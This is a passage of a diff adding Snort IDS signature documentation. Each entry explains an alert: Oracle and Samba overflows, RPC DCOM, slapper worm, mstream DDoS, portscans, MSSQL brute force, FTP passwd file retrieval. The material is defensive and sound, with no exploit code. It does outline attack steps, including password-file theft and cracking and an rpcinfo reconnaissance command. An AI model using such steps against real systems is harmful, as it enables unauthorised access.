+case of databases running on Microsoft Windows platforms, this is the
+Local System account which may mean a compromise of the operating system
+as well as the database.
+
+This event indicates that an attempt has been made to exploit a
+vulnerability in the procedure add_priority_nchar
+. This procedure is included in
+sys.dbms_repcat_conf.
+
+--
+Affected Systems:
+	Oracle Oracle9i
+
+--
+Attack Scenarios: 
+If an attacker can supply enough data to the procedure in question, it
+may be possible to cause the overflow condition to occur and present the
+attacker with the opportunity to execute code of their choosing.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Alex Kirk <alex.kirk@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1065.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1065
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/452.txt
@@ -0,0 +1,63 @@
+Rule:
+
+--
+
+Sid:
+452
+
+--
+
+Summary:
+This event is generated when a network host generates an ICMP Timestamp Reply with an invalid or undefined ICMP Code.
+
+--
+
+Impact:
+Information-gathering.  An ICMP Timestamp Reply message is sent in response to an ICMP Timestamp Request message.  If the ICMP Timestamp Reply message reaches the requesting host it indicates that the replying host is alive.  Most OS's (operating systems) will accept an ICMP Timestamp Reply message with an invalid or undefined ICMP code set as a valid ICMP Timestamp Reply.
+
+--
+
+Detailed Information:
+ICMP Type 0 Code 0 is the RFC defined messaging type for ICMP Timestamp Reply datagrams.  This type of message is used to determine if a host is active on the network.
+
+If ICMP type 8 (echo) traffic is filtered at a firewall, an attacker may try to use type 14 (timestamp) as an alternative.
+
+--
+
+Attack Scenarios:
+Remote attackers my generate ICMP Timestamp Reply datagrams with invalid ICMP Codes in an attempt to cause faults in the applications or hosts generating ICMP Timestamp Requests.
+
+--
+
+Ease of Attack:
+Numerous tools and scripts can generate this type of ICMP datagram.
+
+--
+
+False Positives:
+None known
+
+--
+
+False Negatives:
+None known
+--
+
+Corrective Action:
+Use ingress filtering to prevent ICMP Type 0 messages from entering the network.
+
+--
+
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Matthew Watchinski (matt.watchinski@sourcefire.com)
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+
+Additional References:
+None
+
+
+--
--- /dev/null
+++ b/doc/signatures/3037.txt
@@ -0,0 +1,67 @@
+Rule: 
+
+--
+Sid: 
+3037
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Samba implementation.
+
+-- 
+Impact: 
+Serious. Possible execution of arbitrary code.
+
+--
+Detailed Information:
+Samba is a file and print serving system for heterogenous networks. It
+is available for use as a service and client on UNIX/Linux systems and as
+a client for Microsoft Windows systems.
+
+Samba uses the SMB/CIFS protocols to allow communication between client
+and server. The SMB protocol contains many commands and is commonly used
+to control network devices and systems from a remote location. A
+vulnerability exists in the way the smb daemon processes commands sent by
+a client system when accessing resources on the remote server.The problem
+exists in the allocation of memory which can be exploited by an attacker
+to cause an integer overflow, possibly leading to the execution of
+arbitrary code on the affected system with the privileges of the user
+running the smbd process.
+
+--
+Affected Systems:
+	Samba 3.0.8 and prior
+
+--
+Attack Scenarios: 
+An attacker needs to supply specially crafted data to the smb daemon to
+overflow a buffer containing the information for the access control lists
+to be applied to files in the smb query.
+
+-- 
+Ease of Attack: 
+Difficult.
+
+-- 
+False Positives:
+None Known
+
+--
+False Negatives:
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patch
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3116.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid: 
+3116
+
+-- 
+Summary: 
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft License Logging Service.
+
+-- 
+Impact: 
+Serious. Execution of arbitrary code leading to unauthorized
+administrative access to the target host. Denial of Service (DoS) is
+also possible.
+
+--
+Detailed Information:
+Microsoft License Logging Service is used to manage licenses for
+Microsoft server products.
+
+A vulnerability in the service exists due to a programming error such
+that an unchecked buffer may present an attacker with the opportunity to
+exploit the service and run code of their choosing on an affected
+system. The attacker may then cause a DoS condition in the service or
+possibly gain administrative access to the target host.
+
+The unchecked buffer exists when processing the length of messages sent
+to the logging service.
+
+--
+Affected Systems:
+	Microsoft Windows Server 2003
+	Microsoft Windows Server 2000
+	Microsoft Windows NT Server
+
+--
+Attack Scenarios: 
+An attacker can supply extra data in the message to the service
+containing code of their choosing to be run on the server.
+
+-- 
+Ease of Attack: 
+Simple.
+
+-- 
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+-- 
+
+Corrective Action: 
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors: 
+Sourcefire Vulnerability Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/705.txt
@@ -0,0 +1,64 @@
+Rule:
+
+--
+Sid:
+705
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in Microsoft SQL.
+
+--
+Impact:
+Information gathering and data integrity compromise. Possible unauthorized
+administrative access to the server or application.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to an implementation of Microsoft SQL server or client.  This can
+lead to unauthorized access and possibly escalated privileges to that of 
+the administrator. Data stored on the machine can be compromised and 
+trust relationships between the victim server and other hosts can be 
+exploited by the attacker.
+
+--
+Affected Systems:
+
+--
+Attack Scenarios:
+An attacker can access the authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Disallow administrative access from sources external to the protected
+network.
+
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3133.txt
@@ -0,0 +1,62 @@
+Rule:
+
+--
+Sid:
+3133
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a buffer overflow
+associated with the processing of a Portable Network Graphics (PNG) file by
+the GD Graphics Library.
+
+--
+Impact:
+A successful attack may cause a denial of service or a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.
+
+--
+Detailed Information:
+A vulnerability exists in the way that software that handles PNG files,
+libpng, allocates memory for PNG images. A maliciously formatted PNG
+image sent to a vulnerable server may cause a buffer overflow and the
+subsequent execution of arbitrary code on a vulnerable server.  A
+PNG file with an excessively large image height, width, or depth, or
+combination of these can cause a buffer overflow.
+
+--
+Affected Systems:
+	GD Graphics Library 2.0.28 and earlier
+
+--
+Attack Scenarios:
+An attacker can create a malformed PNG file and upload it to a web server,
+possibly causing a buffer overflow.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Upgrade to the latest non-affected version of the software.
+
+Apply the appropriate vendor supplied patches.
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/886.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+886
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/122-6.txt
@@ -0,0 +1,93 @@
+
+
+Rule:
+
+--
+Sid:
+122-6
+
+--
+Summary:
+This event is generated when the pre-processor sfPortscan detects
+network traffic that may constitute an attack. Specifically a tcp
+filtered decoy portscan was detected.
+
+--
+Impact:
+Unknown. This is normally an indicator of possible network
+reconnaisance and may be the prelude to a targeted attack against the
+targeted systems.
+
+--
+Detailed Information:
+This event is generated when the sfPortscan pre-processor detects
+network traffic that may consititute an attack.
+
+A portscan is often the first stage in a targeted attack against a
+system. An attacker can use different portscanning techniques and tools
+to determine the target host operating system and application versions
+running on the host to determine the possible attack vectors against
+that host.
+
+More information on this event can be found in the individual
+pre-processor documentation README.sfportscan in the docs directory of
+the snort source. Descriptions of different types of portscanning
+techniques can also be found in the same documentation, along with
+instructions and examples on how to tune and use the pre-processor.
+
+--
+Affected Systems:
+	All.
+
+--
+Attack Scenarios:
+An attacker often uses a portscanning technique to determine operating
+system type and version and also application versions to determine
+possible effective attack vectors that can be used against the target
+host.
+
+--
+Ease of Attack:
+Simple. Many portscanning tools are freely available.
+
+--
+False Positives:
+While not necessarily a false positive, a security audit or penetration
+test will often employ the use of a portscan in the same way an
+attacker might use the technique. If this is the case, the
+pre-processor should be tuned to ignore the audit if so desired.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Check for other events targeting the host.
+
+Check the target host for signs of compromise.
+
+Apply any appropriate vendor supplied patches as appropriate.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Daniel Roelker <droelker@sourcefire.com>
+Marc Norton    <mnorton@sourcefire.com>
+Jeremy Hewlett <jh@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+Nmap:
+http://www.insecure.org/nmap/
+
+Port Scanning Techniques and the Defense Against Them - Roger
+Christopher, SANS:
+http://www.sans.org/rr/whitepapers/auditing/70.php
+
+Hypervivid Tiger Team - Port-Scanning: A Practical Approach
+http://www.hcsw.org/reading/nmapguide.txt
+
+--
--- /dev/null
+++ b/doc/signatures/1280.txt
@@ -0,0 +1,61 @@
+Rule:
+
+--
+Sid:
+1280
+
+--
+Summary:
+This event is generated when an attempt is made dump entries from the portmapper.
+
+--
+Impact:
+Information disclosure.  This request can discover what Remote Procedure Call (RPC) services are offered and on what ports they listen. 
+
+--
+Detailed Information:
+The portmapper service registers all RPC services on UNIX hosts.  It can be queried for all RPC services running, the RPC program name and version, the protocol (TCP or UDP), and the port where the service listens.  This can provide an attacker valuable information about which RPC services offered and on which ports.
+
+--
+Affected Systems:
+All hosts running portmapper.
+
+--
+Attack Scenarios:
+An attacker can query the portmapper to discover RPC services and their associated listening ports. 
+
+--
+Ease of Attack:
+Simple. Execute 'rpcinfo -p hostname/IP'.  
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Limit remote access to RPC services.
+
+Filter RPC ports at the firewall to ensure access is denied to RPC-enabled machines.
+
+Disable unneeded RPC services.
+
+--
+Contributors:
+Original rule written by Max Vision <vision@whitehats.com>
+Modified by Brian Caswell <bmc@sourcefire.com>
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS429
+
+
+--
--- /dev/null
+++ b/doc/signatures/1979.txt
@@ -0,0 +1,71 @@
+Rule:
+
+--
+Sid:
+1979
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability on a web server or a web application resident on a web
+server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server. Possible execution of arbitrary code of 
+the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to compromise a host
+running a Web server or a vulnerable application on a web server.
+
+Many known vulnerabilities exist for each implementation and the 
+attack scenarios are legion.
+
+Some applications do not perform stringent checks when validating the
+credentials of a client host connecting to the services offered on a
+host server. This can lead to unauthorized access and possibly escalated
+privileges to that of the administrator. Data stored on the machine can
+be compromised and trust relationships between the victim server and 
+other hosts can be exploited by the attacker.
+
+--
+Affected Systems:
+	All systems using a web server.
+
+--
+Attack Scenarios:
+Many attack vectors are possible from simple directory traversal to
+exploitation of buffer overflow conditions.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+Check the host logfiles and application logs for signs of compromise.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2393.txt
@@ -0,0 +1,57 @@
+Rule:
+
+--
+Sid:
+2393
+
+--
+Summary:
+This event is generated when an attempt is made to access the /_admin directory.
+
+--
+Impact:
+Unauthorized file upload or information gathering.  This can allow an attacker to upload unauthorized files to the web server or information disclosure.
+
+--
+Detailed Information:
+A vulnerability exists in the jbrowser web-based image gallery software that allows unchecked access to the _admin directory, possibly permitting an attacker to execute scripts found in this directory.  Execution of admin scripts upload.php3 and upload_ftp.php3 may allow the attacker to upload malicious files to the server or replace existing files.  Execution of the list_all.php script may allow an attacker to display files in directories, including those not in the web server root directory.
+
+--
+Affected Systems:
+Not reported.
+
+--
+Attack Scenarios:
+An attacker can craft a URL to execute the upload.php3, upload_ftp.php3, and list_all.php scripts to upload files or examine files on the vulnerable server. 
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Restrict access to the '_admin' directory to authorized users only. 
+
+--
+Contributors:
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+bugtraq
+http://www.securityfocus.com/bid/9537
+
+nessus:
+http://cgi.nessus.org/plugins/dump.php3?id=12032
+
+--
--- /dev/null
+++ b/doc/signatures/3183.txt
@@ -0,0 +1,70 @@
+Rule:
+
+--
+Sid:
+3183
+
+--
+Summary:
+This rule generates an event when an attempt is made to exploit a known 
+vulnerability in Microsoft RPC DCOM.
+
+--
+Impact:
+Execution of arbitrary code leading to full administrator access of the 
+machine. Denial of Service (DoS).
+
+--
+Detailed Information:
+A vulnerability exists in Microsoft RPC DCOM such that execution of 
+arbitrary code or a Denial of Service condition can be issued against a 
+host by sending malformed data via RPC.
+
+The Distributed Component Object Model (DCOM) handles DCOM requests sent
+by clients to a server using RPC. A malformed request to an RPC port 
+will result in a buffer overflow condition that will present the 
+attacker with the opportunity to execute arbitrary code with the 
+privileges of the local system account.
+
+--
+Affected Systems:
+	Windows NT 4.0
+	Windows NT 4.0 Terminal Server Edition
+	Windows 2000
+	Windows XP
+	Windows Server 2003
+
+--
+Attack Scenarios:
+An attacker may make a request for a file with an overly long filename 
+via a network share.
+
+--
+Ease of Attack:
+Simple. Expoit code exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patches.
+
+Block access to RPC ports 135, 139 and 445 for both TCP and UDP 
+protocols from external sources using a packet filtering firewall.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/2608.txt
@@ -0,0 +1,73 @@
+Rule:
+
+--
+Sid:
+2608
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known
+vulnerability in a Oracle database implementation.
+
+--
+Impact:
+Serious. Execution of arbitrary code may be possible. A Denial of
+Service (DoS) condition may also be caused.
+
+--
+Detailed Information:
+Oracle databases may use a built-in procedure to assist in useful
+tasks. The "check_ddl_text" procedure contains a programming error
+that may allow an attacker to execute a buffer overflow attack.
+
+This overflow is triggered by a long string in a parameter for the
+procedure.
+
+
+If you are running Oracle on a Windows server, make sure that the
+variable $ORACLE_PORTS is set to a value of "any".
+
+--
+Affected Systems:
+        Oracle 9i
+
+--
+Attack Scenarios:
+An attacker can supply a long string to the second variable to cause
+the overflow. The result could permit the attacker to gain escalated
+privileges and run code of their choosing. This attack requires an
+attacker to logon to the database with a valid username and password
+combination.
+
+--
+Ease of Attack:
+Simple.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Vulnerability Research Team
+Matt Watchinski <mwatchinski@sourcefire.com>
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+Other:
+http://www.appsecinc.com/Policy/PolicyCheck97.html
+
+--
--- /dev/null
+++ b/doc/signatures/250.txt
@@ -0,0 +1,60 @@
+Rule:
+
+--
+Sid:
+250
+
+--
+Summary:
+The event is generated when a DDoS mstream handler responds to an mstream client.
+
+--
+Impact:
+Severe.  If the source IP is in your network, it is possibly an mstream handler.  If the destination IP is in your network, it is possibly an mstream client.
+
+--
+Detailed Information:
+The mstream DDoS uses a tiered structure of compromised hosts to coordinate and participate in a distributed denial of service attack. At the highest level, clients communicate with handlers to direct them to launch attacks.  A client may contact a handler using a TCP SYN packet to destination port 15104.  A listening handler would respond to this on source port 15104 with a string of ">" in the payload.
+
+--
+Affected Systems:
+Any mstream compromised host.
+
+--
+Attack Scenarios:
+After a host becomes an mstream handler, the client will attempt to communicate with the handler.  A handler will respond to this communication.
+
+
+--
+Ease of Attack:
+Simple. mstream code is freely available.
+
+--
+False Positives:
+A legitimate server port of 15104 will cause this rule to fire.  This rule may also generate a false positive if port 15104 is selected as an FTP data port.
+
+--
+False Negatives:
+There are other known client-to-handler ports in addition to 15104.
+
+Corrective Action:
+Perform proper forensic analysis on the suspected compromised host to discover the means of compromise.
+
+Rebuild a confirmed compromised host.
+
+Use a packet-filtering firewall to block inappropriate traffic to the network to prevent hosts from being compromised.
+
+--
+Contributors:
+Original rule writer unknown
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CVE:
+http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0138
+
+
+--
--- /dev/null
+++ b/doc/signatures/356.txt
@@ -0,0 +1,64 @@
+Rule: 
+
+--
+Sid: 356
+
+-- 
+
+Summary:
+This event is generated when an attempt to retrieve a specific file, in this case the systems user database from an FTP server is made.
+
+-- 
+Impact: 
+Serious. The attacker may obtain a valid list of user names and/or encrypted passwords from the server.
+
+--
+Detailed Information:
+This event is generated when an attempt to download a copy of the "passwd" file from the server is made.
+
+The UNIX "passwd" file (typically located in "/etc/" directory) is used to hold the authentication information for system logins. This file needs to be readable by all system users. 
+
+Where shadow passwords are used, the actual encrypted passwords are stored in a separate file, only readable by root. It is possible to use various password cracking tools to obtain unencrypted passwords either by trying random character combinations, a predefined word list or a combination of public user information. The attacker may use the information contained in the passwd file to launch a dictionary attack against the victim host or other hosts the same users may have access to.
+
+--
+Attack Scenarios: 
+The attacker downloads a "passwd" file from a machine that does not use shadowed passwords and uses a tool like John-the-Ripper to crack the passwords used for several accounts. He then proceeds to login to the system remotely and possibly gain escalated privileges via a local exploit on the system.
+
+-- 
+
+Ease of Attack: 
+Simple. The attack usually requires FTP access to the /etc/ directory either by system misconfiguration or via a directory traversal technique. Also, in the rare circumstances the system administrator may have accidentally left a copy of a "passwd" file in a directory accessible for anonymous or other FTP users, which presents a high security risk and simplifies the attack.
+
+-- 
+
+False Positives: 
+If the string "passwd" is contained within an otherwise innocuous filename being retrieved from a server, the rule will generate an event. 
+
+Also, the anonymous FTP account often has a separate password file within the chrooted anonymous FTP directory (e.g. /var/ftp/etc/passwd). This file does not usually contain valid system usernames and passwords. While technically not a false positive, this may be considered a false alarm.
+
+--
+
+False Negatives:
+None Known
+
+-- 
+
+Corrective Action: 
+Identify the downloaded file and confirm that it indeed a valid system password file. Change the user passwords on the system and notify the users.
+
+Ensure that FTP access to sensitive system files is not allowed.
+
+--
+Contributors: 
+Original rule writer Max Vision <vision@whitehats.com>
+Snort documentation contributed by Anton Chuvakin <http://www.chuvakin.org>
+Sourcefire Research Team
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+Arachnids:
+http://www.whitehats.com/info/IDS319
+
+--
--- /dev/null
+++ b/doc/signatures/2418.txt
@@ -0,0 +1,54 @@
+Rule:  
+
+--
+Sid:
+
+--
+Summary:
+This event is generated when an attempt is made to connect to a
+Microsoft Terminal Server without using encryption.
+
+--
+Impact:
+Serious. Denial of Service.
+
+--
+Detailed Information:
+Microsoft Windows Terminal Server for NT systems fails to correctly
+validate RDP data from client machines that do not use encryption.
+
+--
+Affected Systems:
+	Microsoft Windows Terminal Server
+
+--
+Attack Scenarios:
+An attacker can use one of the publicly available exploit scripts to
+cause the DoS.
+
+--
+Ease of Attack:
+Simple. Exploit software exists.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Apply the appropriate vendor supplied patch.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/3273.txt
@@ -0,0 +1,69 @@
+Rule: 
+
+--
+Sid:
+3152
+
+-- 
+Summary: 
+This event is generated when an attempt is made to access a host running
+Microsoft SQL Server or utilizing MSDE via the default "sa" account.
+
+-- 
+Impact: 
+Information disclosure. Unauthorized access to the host.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to access a host via the
+"sa" account using brute force techniques to guess a password.
+
+Microsoft SQL server and MSDE components use a default "sa" account with
+a default password as the administrative user for the database
+installation. This event indicates that numerous failed attempts have
+been made to access the target host using this account.
+
+--
+Affected Systems:
+	Microsoft SQL Server 2000
+	Microsoft SQL Server 7.0
+	Systems using Microsoft MSDE components
+
+--
+Attack Scenarios:  
+An attacker can use an automated script to gain access to a host and the
+database contents as an administrator by repeatly attempting to login
+using the "sa" account and different passwords.
+
+Some worms also try to brute force entry using this methodology.
+
+-- 
+Ease of Attack: 
+Simple,
+
+-- 
+False Positives: 
+None Known
+
+--
+False Negatives: 
+None Known
+
+-- 
+Corrective Action: 
+Apply the appropriate vendor supplied patches
+
+Change the default "sa" password
+
+Disable the "sa" account.
+
+--
+Contributors: 
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+-- 
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1453.txt
@@ -0,0 +1,69 @@
+Rule:
+
+--
+Sid:
+1453
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in a CGI web application running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event is generated when an attempt is made to gain unauthorized
+access to a CGI application running ona web server. Some applications do
+not perform stringent checks when validating the credentials of a client
+host connecting to the services offered on a host server. This can lead
+to unauthorized access and possibly escalated privileges to that of the
+administrator. Data stored on the machine can be compromised and trust
+relationships between the victim server and other hosts can be exploited by the attacker.
+
+If stringent input checks are not performed by the CGI application, it
+may also be possible for an attacker to execute system binaries or
+malicious code of the attackers choosing.
+
+--
+Affected Systems:
+	All systems running CGI applications
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying CGI script.
+
+--
+Ease of Attack:
+Simple. Exploits exist.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1887.txt
@@ -0,0 +1,55 @@
+Rule:
+
+--
+Sid:
+1887
+
+--
+Summary:
+This event is generated when a web server infected by the slapper worm attempts to infect a web server running OpenSSL.
+
+--
+Impact:
+Attempted remote access.  The slapper worm attempts to exploit a buffer overflow vulnerability associated with vulnerable versions of OpenSSL, permitting the execution of arbitrary code on the vulnerable server.
+
+--
+Detailed Information:
+The Apache/mod_ssl worm, also known as slapper, exploits a buffer overflow vulnerability associated with certain versions of OpenSSL. It spreads by attempting to infect other vulnerable web hosts listening on TCP port 443.  If the attack is successful, the worm gains control over the vulnerable host and attempts to spread to other hosts.  
+
+--
+Affected Systems:
+Linux hosts running Apache with mod_ssl using SSLv2-enabled OpenSSL 0.9.6d or earlier on Intel x86 architectures.
+
+--
+Attack Scenarios:
+The slapper worm attempts to exploit a buffer overflow vulnerability associated with OpenSSL, permitting the execution of arbitrary code on the vulnerable server and facilitating the spread of the worm.
+
+--
+Ease of Attack:
+Simple.  Exploit code exists. 
+
+--
+False Positives:
+None Known.
+
+--
+False Negatives:
+None Known.
+
+--
+Corrective Action:
+Apply the appropriate patch or upgrade to the most current version of OpenSSL.
+
+--
+Contributors:
+Original rule writer unknown.
+Sourcefire Research Team
+Judy Novak <judy.novak@sourcefire.com>
+
+--
+Additional References:
+
+CERT
+http://www.cert.org/advisories/CA-2002-27.html
+
+--
--- /dev/null
+++ b/doc/signatures/2299.txt
@@ -0,0 +1,65 @@
+Rule:
+
+--
+Sid:
+2299
+
+--
+Summary:
+This event is generated when an attempt is made to exploit a known 
+vulnerability in the PHP web application Proxy2.de Advanced Poll 2.0.2
+running on a server.
+
+--
+Impact:
+Information gathering and system integrity compromise. Possible unauthorized
+administrative access to the server or application. Possible execution
+of arbitrary code of the attackers choosing in some cases.
+
+--
+Detailed Information:
+This event indicates that an attempt may have been made to exploit a
+known vulnerability in the PHP application Proxy2.de Advanced Poll
+2.0.2. This application does not perform stringent checks when handling
+user input, this may lead to the attacker being able to execute PHP
+code, include php files and possibly retrieve sensitive files from the
+server running the application.
+
+--
+Affected Systems:
+	All systems running Proxy2.de Advanced Poll 2.0.2
+
+--
+Attack Scenarios:
+An attacker can access an authentication mechanism and supply his/her
+own credentials to gain access. Alternatively the attacker can exploit
+weaknesses to gain access as the administrator by supplying input of
+their choosing to the underlying PHP script.
+
+--
+Ease of Attack:
+Simple. No exploit code is required.
+
+--
+False Positives:
+None known.
+
+--
+False Negatives:
+None known.
+
+--
+Corrective Action:
+Ensure the system is using an up to date version of the software and has
+had all vendor supplied patches applied.
+
+--
+Contributors:
+Sourcefire Research Team
+Brian Caswell <bmc@sourcefire.com>
+Nigel Houghton <nigel.houghton@sourcefire.com>
+
+--
+Additional References:
+
+--
--- /dev/null
+++ b/doc/signatures/1641.txt
@@ -0,0 +1,53 @@
+Rule:
+
+--
+Sid:
+1641
+
+--
+Summary:
+This event is generated when potential Denial of Service (DoS) traffic is detected on the network. 
+
+--
+Impact:
+Serious. A DoS attack may be underway.
+
+--
+Detailed Information:
